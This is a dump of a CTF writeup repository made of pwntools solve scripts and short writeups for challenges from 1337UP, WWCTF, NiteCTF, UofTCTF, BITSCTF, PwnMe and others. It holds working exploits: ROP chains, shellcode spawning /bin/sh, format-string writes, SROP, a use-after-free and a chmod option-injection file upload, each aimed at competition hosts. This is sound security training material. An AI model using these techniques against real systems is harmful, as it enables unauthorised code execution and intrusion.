p.readuntil(b"n=") 10 | n = int(p.readline().decode()) 11 | 12 | p.readuntil(b"e=") 13 | e = int(p.readline().decode()) 14 | 15 | p.readuntil(b"ck=") 16 | ck = int(p.readline().decode()) 17 | 18 | def recover_k(c, e, n): 19 | A = {} 20 | for i in range(1, 0xffff): 21 | x = (pow(pow(i, -1, n), e, n) * c) % n 22 | A[x] = i 23 | 24 | for j in range(1, 0xfffff): 25 | y = pow(j, e, n) 26 | if y in A: 27 | i = A[y] 28 | return i * j 29 | 30 | k = recover_k(ck, e, n) 31 | 32 | p.sendlineafter(b"Secret key ? ", str(k).encode()) 33 | 34 | p.interactive() # INTIGRITI{w3_sh0uld_m33t_1n_th3_m1ddl3} 35 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/crypto/schrodingers_pad/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("pad.ctf.intigriti.io", 1348) 7 | 8 | p.readuntil(b": ") 9 | 10 | flag = bytes.fromhex(p.readline().decode()) 11 | 12 | known_plaintext = b"A" * 160 13 | p.sendlineafter(b"yourself?\n", known_plaintext) 14 | 15 | p.readuntil(b"state=") 16 | state = p.readuntil(b"): ")[:-3] 17 | 18 | ciphertext = bytearray(bytes.fromhex(p.readline().decode())) 19 | 20 | if state == b"alive": 21 | for i in range(len(ciphertext)): 22 | ciphertext[i] ^= 0xAC 23 | ciphertext[i] = ciphertext[i] >> 1 24 | 25 | if state == b"dead": 26 | for i in range(len(ciphertext)): 27 | ciphertext[i] ^= 0xCA 28 | ciphertext[i] = ((ciphertext[i] << 1) | (ciphertext[i] >> 7)) & 0xFF 29 | 30 | keystream = xor(known_plaintext, ciphertext) 31 | flag = xor(keystream, flag).decode()[37:61] 32 | print(flag) # INTIGRITI{d34d_0r_4l1v3} 33 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/crypto/schrodingers_pad/schrodingers_pad.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/crypto/schrodingers_pad/schrodingers_pad.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/floormat_mega_sale/floormat_sale.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/floormat_mega_sale/floormat_sale.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/floormat_mega_sale/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./floormat_sale", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("floormatsale.ctf.intigriti.io", 1339) 12 | 13 | p.sendlineafter(b"your choice:\r\n", str(6).encode()) 14 | 15 | payload = fmtstr_payload(10, {elf.sym["employee"]: 1 & 0xff}) 16 | p.sendlineafter(b"shipping address:\r\n", payload) 17 | 18 | p.readuntil(b"delivered to: ") 19 | print(p.readline()[:-2].decode()) # INTIGRITI{3v3ry_fl00rm47_mu57_60!!} 20 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/retro2win/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./retro2win", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("retro2win.ctf.intigriti.io", 1338) 12 | 13 | p.sendlineafter(b"option:\r\n", str(0x539).encode()) 14 | 15 | rop = ROP(elf) 16 | rop.raw(b"A" * 0x18) 17 | rop.rdi = 0x2323232323232323 18 | rop.rsi = 
0x4242424242424242 19 | rop.call("cheat_mode") 20 | 21 | p.sendlineafter(b"Enter your cheatcode:\r\n", rop.chain()) 22 | 23 | p.readuntil(b"FLAG: ") 24 | 25 | print(p.readline()[:-2].decode()) # INTIGRITI{3v3ry_c7f_n33d5_50m3_50r7_0f_r372w1n} 26 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/retro2win/retro2win.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/retro2win/retro2win.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/rigged_slot_machine_2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import ctypes 5 | 6 | context.log_level = "debug" 7 | elf = ELF("./rigged_slot2", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ctypes.CDLL("./ubuntu:23.04.libc.so.6") 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("riggedslot2.ctf.intigriti.io", 1337) 15 | 16 | libc.srand(libc.time(0)) 17 | 18 | # have to play at least once... 19 | # ... 
and the resulting balance should be equal to 0x14684c 20 | 21 | bet = 69 22 | iVar2 = libc.rand() % 1000 23 | local_c = 0 24 | 25 | if iVar2 == 0: 26 | local_c = 10 27 | elif iVar2 < 5: 28 | local_c = 5 29 | elif iVar2 < 10: 30 | local_c = 3 31 | elif iVar2 < 0xf: 32 | local_c = 2 33 | elif iVar2 < 0x1e: 34 | local_c = 1 35 | 36 | winnings = bet * local_c - bet 37 | starting_balance = 0x14684c - winnings 38 | 39 | payload = b"" 40 | payload += b"A" * 0x14 41 | payload += p32(starting_balance) 42 | p.sendlineafter(b"Enter your name:", payload) 43 | 44 | p.sendlineafter(b"per spin): ", str(69).encode()) 45 | 46 | p.interactive() # INTIGRITI{1_w15h_17_w45_7h15_345y_1n_v3645} 47 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/rigged_slot_machine_2/rigged_slot2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/rigged_slot_machine_2/rigged_slot2.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/uap/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./drone", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b start_drone_route") 11 | p = remote("uap.ctf.intigriti.io", 1340) 12 | 13 | def deploy_drone(): 14 | p.sendline(b"1") 15 | 16 | def retire_drone(): 17 | p.sendline(b"2") 18 | p.sendline(b"1") 19 | 20 | def start_drone_route(): 21 | p.sendline(b"3") 22 | p.sendline(b"1") 23 | 24 | def enter_drone_route(): 25 | p.sendline(b"4") 26 | payload = b"" 27 | payload += b"A" * 16 28 | payload += p64(elf.sym["print_drone_manual"]) 29 | p.sendline(payload) 30 | 31 | deploy_drone() 32 | retire_drone() 33 | 
enter_drone_route() 34 | start_drone_route() 35 | 36 | p.readuntil(b"start its route: ") 37 | print(p.readline()[:-2].decode()) # INTIGRITI{un1d3n71f13d_fly1n6_vuln3r4b1l17y} 38 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/uap/uap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/uap/uap.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/rev/secure_bank/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./secure_bank", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("securebank.ctf.intigriti.io", 1335) 12 | 13 | p.sendline(str(0x539).encode()) 14 | 15 | p.sendline(str(0x568720).encode()) 16 | 17 | p.readuntil(b"your flag: ") 18 | 19 | print(p.readline()[:-2].decode()) # INTIGRITI{pfff7_wh47_2f4?!} 20 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/rev/secure_bank/secure_bank: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/rev/secure_bank/secure_bank -------------------------------------------------------------------------------- /2024_11_15_1337UP24/rev/secure_bank/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2446 2 | 3 | # Secure Bank (rev) 4 | 5 | Can you crack the bank? 
6 | 7 | nc securebank.ctf.intigriti.io 1335 8 | 9 | ## Solution 10 | 11 | ```python 12 | #!/usr/bin/env python3 13 | 14 | from pwn import * 15 | 16 | #context.log_level = "debug" 17 | elf = ELF("./secure_bank", checksec=False) 18 | context.binary = elf 19 | 20 | #p = elf.process() 21 | #p = elf.debug(gdbscript="") 22 | p = remote("securebank.ctf.intigriti.io", 1335) 23 | 24 | p.sendline(str(0x539).encode()) 25 | 26 | p.sendline(str(0x568720).encode()) 27 | 28 | p.readuntil(b"your flag: ") 29 | 30 | print(p.readline()[:-2].decode()) # INTIGRITI{pfff7_wh47_2f4?!} 31 | ``` 32 | 33 | ## Flag 34 | `INTIGRITI{pfff7_wh47_2f4?!}` 35 | 36 | smiley 2024/11/16 37 | -------------------------------------------------------------------------------- /2024_11_22_GlacierCTF24/README.md: -------------------------------------------------------------------------------- 1 | # GlacierCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2402 4 | 5 | 33rd place 1263 points 6 | -------------------------------------------------------------------------------- /2024_11_22_GlacierCTF24/crypto/rivest_shamir_adleman_germain/rsag.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_22_GlacierCTF24/crypto/rivest_shamir_adleman_germain/rsag.tar.gz -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/README.md: -------------------------------------------------------------------------------- 1 | # WWCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2572 4 | 5 | 342nd place 145 points 6 | -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/crypto/simpler_rsa/chal.py: -------------------------------------------------------------------------------- 1 | from secret import flag 2 | from Crypto.Util.number import bytes_to_long, getPrime 3 | 4 | flag = bytes_to_long(flag) 5 | 
p = getPrime(2048) 6 | q = getPrime(2048) 7 | c = pow(flag, p, q) # i believe this is the fancy rsa encryption? 8 | print(f'{p=}') 9 | print(f'{q=}') 10 | print(f'{c=}') 11 | -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./white_rabbit", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b follow") 11 | p = remote("whiterabbit.chal.wwctf.com", 1337) 12 | 13 | p.readuntil(b"> ") 14 | leak = int(p.readline().decode(), 16) 15 | elf.address = leak - elf.sym["main"] 16 | 17 | JMP_RAX = 0x00000000000010bf 18 | # gets sets rax to &buf 19 | 20 | payload = asm(shellcraft.sh()) 21 | payload = payload.ljust(0x78, b"A") 22 | payload += p64(JMP_RAX + elf.address) 23 | p.sendline(payload) 24 | 25 | p.sendline(b"/bin/cat flag.txt") 26 | 27 | p.interactive() # wwf{jmp_d0wn_th3_r4bb1t_h0le_0caba44088} 28 | -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/pwn/white_rabbit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_30_WWCTF24/pwn/white_rabbit -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/pwn/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2572 2 | 3 | # White Rabbit (pwn) 4 | 5 | Just a nice easy warmup for you... 
6 | 7 | nc whiterabbit.chal.wwctf.com 1337 8 | 9 | ## Solution 10 | 11 | 1) Use leak to get elf base 12 | 2) Write shellcode to the stack such that rax is equal to the start of the shellcode 13 | 3) Use jmp rax gadget / ret2reg to call shellcode 14 | 15 | ```python 16 | #!/usr/bin/env python3 17 | 18 | from pwn import * 19 | 20 | #context.log_level = "debug" 21 | elf = ELF("./white_rabbit", checksec=False) 22 | context.binary = elf 23 | 24 | #p = elf.process() 25 | #p = elf.debug(gdbscript="b follow") 26 | p = remote("whiterabbit.chal.wwctf.com", 1337) 27 | 28 | p.readuntil(b"> ") 29 | leak = int(p.readline().decode(), 16) 30 | elf.address = leak - elf.sym["main"] 31 | 32 | JMP_RAX = 0x00000000000010bf 33 | # gets sets rax to &buf 34 | 35 | payload = asm(shellcraft.sh()) 36 | payload = payload.ljust(0x78, b"A") 37 | payload += p64(JMP_RAX + elf.address) 38 | p.sendline(payload) 39 | 40 | p.sendline(b"/bin/cat flag.txt") 41 | 42 | p.interactive() # wwf{jmp_d0wn_th3_r4bb1t_h0le_0caba44088} 43 | ``` 44 | 45 | ## Flag 46 | `wwf{jmp_d0wn_th3_r4bb1t_h0le_0caba44088}` 47 | 48 | smiley 2024/12/01 49 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Nite CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2461 4 | 5 | 145th place 227 points 6 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/mixed_signal/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chal", checksec=True) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("mixed-signal.chals.nitectf2024.live", 1337, ssl=True) 12 | 13 | rop = ROP(elf) 14 | rop.raw(b"A" * 0x10) 15 | rop.call("vuln") 16 | 
rop.raw(p64(rop.find_gadget(['syscall']).address)) 17 | 18 | frame = SigreturnFrame(kernel="amd64") 19 | frame.rax = constants.SYS_sendfile 20 | frame.rdi = 1 # int out_fd / FILE_STDOUT 21 | frame.rsi = 5 # int in_fd / open("flag.txt") 22 | frame.rdx = 0 # off_t offset 23 | frame.r10 = 64 # size_t count / too much / a guess 24 | frame.rip = rop.find_gadget(['syscall']).address 25 | 26 | rop.raw(bytes(frame)) 27 | 28 | p.sendlineafter(b"pickup!\n", rop.chain()) 29 | 30 | input() 31 | 32 | p.sendline(b"A" * 14) # send 15 bytes total ~ vuln reads them and sets rax = 15/sigreturn 33 | 34 | p.interactive() # nite{b0b'5_s1gn4ls_h4v3_b33N_retUrN3D} 35 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/mixed_signal/handout.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_12_13_NiteCTF24/pwn/mixed_signal/handout.zip -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/print_the_gifts/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="") 13 | p = remote("print-the-gifts.chals.nitectf2024.live", 1337, ssl=True) 14 | 15 | p.sendlineafter(b">", b"%43$p") 16 | p.readuntil(b"Santa brought you a ") 17 | leak = int(p.readline().decode(), 16) 18 | libc.address = leak - 0x27305 19 | log.success(f"libc: {hex(libc.address)}") 20 | p.sendlineafter(b"y or n:\n", b"y") 21 | 22 | p.sendlineafter(b">", b"%1$p") 23 | p.readuntil(b"Santa brought you a ") 24 | leak = int(p.readline().decode(), 16) 25 | retaddr = leak + 0x21a8 26 | 
log.success(f"ret: {hex(retaddr)}") 27 | 28 | rop = ROP(libc) 29 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 30 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 31 | rop.call("system") 32 | payload = rop.chain() 33 | 34 | for i in range(len(payload)): 35 | p.sendlineafter(b"y or n:\n", b"y") 36 | p.sendlineafter(b">", fmtstr_payload(8, {retaddr + i: p8(payload[i])})) 37 | 38 | p.sendlineafter(b"y or n:\n", b"n") 39 | 40 | p.interactive() # nite{0nLy_n4ugHty_k1d5_Use_%n} 41 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/print_the_gifts/handout.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_12_13_NiteCTF24/pwn/print_the_gifts/handout.zip -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/README.md: -------------------------------------------------------------------------------- 1 | # UofTCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2570 4 | 5 | 481st place 300 points 6 | -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn/baby-pwn.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_11_UofTCTF25/pwn/baby_pwn/baby-pwn.zip -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./baby-pwn", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("34.162.142.123", 5000) 12 | 13 | 
p.readuntil(b"secret: ") 14 | elf.sym["secret"] = int(p.readline().decode(), 16) 15 | 16 | payload = b"A" * 0x48 17 | payload += p64(elf.sym["secret"]) 18 | p.sendlineafter(b"Enter some text: ", payload) 19 | 20 | p.readuntil(b"flag: ") 21 | log.success(p.readline().decode()) 22 | # uoftctf{buff3r_0v3rfl0w5_4r3_51mp13_1f_y0u_kn0w_h0w_t0_d0_1t} 23 | -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn_2/baby-pwn-2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_11_UofTCTF25/pwn/baby_pwn_2/baby-pwn-2.zip -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn_2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./baby-pwn-2", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b vulnerable_function") 11 | p = remote("34.162.119.16", 5000) 12 | 13 | p.readuntil(b"leak: ") 14 | leak = int(p.readline().decode(), 16) 15 | 16 | shellcode = asm(""" 17 | mov rdi, 0x404008 18 | mov byte ptr [rdi], 0 19 | mov rbx, 0x68732f2f6e69622f 20 | mov rdi, 0x404000 21 | mov [rdi], rbx 22 | xor rdx, rdx 23 | xor rsi, rsi 24 | mov rax, 59 25 | syscall 26 | """) 27 | 28 | payload = shellcode.ljust(0x48, b"A") 29 | payload += p64(leak) 30 | p.sendlineafter(b"text: ", payload) 31 | 32 | p.interactive() # uoftctf{sh3llc0d3_1s_pr3tty_c00l} 33 | -------------------------------------------------------------------------------- /2025_01_18_SrdnlenCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Srdnlen CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2576 4 | 5 | 266th place 60 points 6 | 
-------------------------------------------------------------------------------- /2025_01_24_x3CTF25/README.md: -------------------------------------------------------------------------------- 1 | # x3 CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2467 4 | 5 | 82nd place 433 points 6 | -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/crypto/curved-mvm/curved-mvm.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_24_x3CTF25/crypto/curved-mvm/curved-mvm.tar.gz -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/pwn/devnull-as-a-service/devnull-as-a-service.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_24_x3CTF25/pwn/devnull-as-a-service/devnull-as-a-service.tar.gz -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/pwn/secure-sandbox/secure-sandbox.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_24_x3CTF25/pwn/secure-sandbox/secure-sandbox.tar.gz -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/web/submission/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2467/ 2 | 3 | # submission (Web) 4 | php app 5 | 6 | ## Solution 7 | The bug is on this line: 8 | ```php 9 | $shell = shell_exec('chmod 000 *'); 10 | ``` 11 | If we create a file with a name like `--help`, the shell expands `*` to include that name and chmod interprets it as an option instead of a file. Writing the call as `chmod 000 -- *` or `chmod 000 ./*` stops file names from being parsed as options.
12 | So we use `--reference=somefile` that replaces the 000 mode with the perms from `somefile`. 13 | 14 | The second interesting part is how we get a file that has read perms. We can't create files with `/` so no path traversal. The solution is to create a dotfile, glob won't select those. So the perms remain the same. 15 | 16 | ```python 17 | #!/usr/bin/env python3 18 | import requests 19 | 20 | REMOTE = "http://0.0.0.0:8080/" 21 | 22 | res = requests.post(REMOTE, files={"file": (".abc.txt", "ble")}) 23 | res = requests.post(REMOTE, files={"file": ("--reference=.abc.txt", "ble")}) 24 | res = requests.get(REMOTE + "/uploads/flag.txt") 25 | print(res.text) 26 | ``` 27 | 28 | ## Flag 29 | `x3c{4lw4y5_chm0d_y0ur3_f1l35_4_53cur17y}` 30 | 31 | shafouz 2025/01/26 32 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Bearcat CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2596 4 | 5 | 99th place 1600 points 6 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/crypto/sqRSA/output.txt: -------------------------------------------------------------------------------- 1 | e = 2 2 | p = 8946541176074654913817717054410771331419218032593785296134838490312525894218240553305396599307555077734655624876704161811830296918000348456470769765921767 3 | q = 8932929811422923151480388874853984777290071075825590049173830382535883452482114410463430296988680318519251836647527145507992221700683938654669731212502879 4 | n = 79918824380879984230214478212107859789970760434299554608805294793725784734356035450441094355662829397276452220713697299759466084320223642049726452788651518853937184518959195516619507938497758925978032369947277889352888108330331269331130005097469138112607532759174992940835608455793923500626923539208576267193 5 | c = 
17349894155329354363328734000800652637346887108866919240446747423455120556394923514564284438906649577094462846372316919957176356395706169922421515974398971844608693078173465906525109301576180786133798467234128571459625488335621909834995712400917418963473920470534646258784866422718709370743346105151573384808 6 | Traceback (most recent call last): 7 | File "sqRSA.py", line 23, in 8 | d = pow(e,-1,phi) # It always errors here?!!?! 9 | ValueError: base is not invertible for the given modulus 10 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/crypto/sqRSA/sqRSA.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import getPrime, bytes_to_long 2 | from Crypto.Util.Padding import pad 3 | 4 | with open('flag.txt','rb') as fil: 5 | FLAG = fil.read() 6 | 7 | e = 2 8 | p = getPrime(512) 9 | q = getPrime(512) 10 | n = p*q 11 | 12 | print(f'{e = }') 13 | print(f'{p = }') 14 | print(f'{q = }') 15 | print(f'{n = }') 16 | 17 | m = bytes_to_long(pad(FLAG,100)) 18 | c = pow(m, e, n) 19 | 20 | print(f'{c = }') 21 | 22 | phi = (p-1)*(q-1) 23 | d = pow(e,-1,phi) # It always errors here?!!?! 
24 | 25 | print(f'{phi = }') 26 | print(f'{d = }') 27 | 28 | pt = pow(c,d,n) 29 | assert pt == m 30 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/pwn/calling_convention/calling_convention.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_02_01_BearcatCTF25/pwn/calling_convention/calling_convention.zip -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/pwn/calling_convention/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./calling_convention", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chal.bearcatctf.io", 39440) 12 | 13 | payload = b"A" * 0x10 14 | payload += p64(elf.sym["number3"]+0x8) 15 | payload += p64(elf.sym["set_key1"]) 16 | payload += p64(elf.sym["ahhhhhhhh"]+0x8) 17 | payload += p64(elf.sym["food"]) 18 | payload += p64(elf.sym["win"]+0x5) 19 | 20 | p.sendlineafter(b"> ", payload) 21 | 22 | p.readuntil(b"{") 23 | 24 | # BCCTF{R0p_Ch41ns_1b01c1c3} 25 | print("BCCTF{" + p.readuntil(b"}").decode()) 26 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/README.md: -------------------------------------------------------------------------------- 1 | # BITSCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2607/ 4 | 5 | 135th place 891 points 6 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/crypto/baby_crypto/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p 
= remote("chals.bitskrieg.in", 7000) 7 | 8 | p.readuntil(b"n = ") 9 | n = int(p.readline().decode()) 10 | 11 | p.readuntil(b"e = ") 12 | e = int(p.readline().decode()) 13 | 14 | p.readuntil(b"ct = ") 15 | c = int(p.readline().decode()) 16 | 17 | c2 = (pow(2, e, n) * c) % n # unpadded RSA is multiplicative: c2 decrypts to 2*m mod n, so presumably the service refuses c itself but still decrypts this related value; randomized padding such as OAEP removes the property 18 | p.sendlineafter(b"Ciphertext (int):", str(c2).encode()) 19 | 20 | p.readuntil(b"seek : ") 21 | m = int(p.readline().decode()) // 2 # halve the returned plaintext; exact only if 2*m < n, i.e. no modular wrap 22 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8).decode() 23 | 24 | # BITSCTF{r54_0r4acl3_h4s_g0t_t0_b3_0n3_0f_7h3_3as13st_crypt0_1n_my_0p1n10n_74b15203} 25 | print(flag) 26 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/pwn/baby_pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./main", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chals.bitskrieg.in", 6001) 12 | 13 | JMP_RAX = 0x4010ac # : jmp rax (used as an absolute address, so the binary is presumably not PIE; TODO confirm) 14 | 15 | payload = asm(shellcraft.sh()).ljust(0x78, b"A") # shellcode padded to 0x78 bytes; presumably rax points at this buffer when the function returns, which only works with an executable stack (NX off) 16 | payload += p64(JMP_RAX) 17 | p.sendline(payload) 18 | 19 | p.sendline(b"/bin/cat flag.txt") 20 | 21 | # BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205} 22 | print(p.readuntil(b"}").decode()) 23 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/pwn/baby_pwn/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_02_07_BITSCTF25/pwn/baby_pwn/main -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/pwn/biscuits/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import ctypes 5 | import 
struct 6 | 7 | #context.log_level = "debug" 8 | elf = ELF("./main", checksec=False) 9 | context.binary = elf 10 | 11 | cookies = elf.read(elf.sym["cookies"], 0x500) 12 | 13 | # sha256: e7a914a33fd4f6d25057b8d48c7c5f3d55ab870ec4ee27693d6c5f3a532e6226 14 | libc = ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6") 15 | 16 | #p = elf.process() 17 | #p = elf.debug(gdbscript="") 18 | p = remote("20.244.40.210", 6000) 19 | 20 | now = libc.time(0) 21 | libc.srand(now) 22 | 23 | for i in range(100): 24 | idx = libc.rand() % 100 25 | cookie = struct.unpack(" ") 14 | p.sendline(str((elf.got["puts"] - elf.sym["PNJs"]) >> 5).encode()) 15 | 16 | p.readuntil(b"> ") 17 | p.sendline(p64(0) + p64(elf.sym["shell"])) 18 | 19 | p.sendline(b"/bin/cat ../flag") 20 | flag = p.readuntil(b"}") 21 | print(flag.decode()) # PWNME{G0t_Ov3Rwr1t3_fTW__} 22 | -------------------------------------------------------------------------------- /2025_02_28_PwnMeCTFQuals25/pwn/got/got.zip: -------------------------------------------------------------------------------- 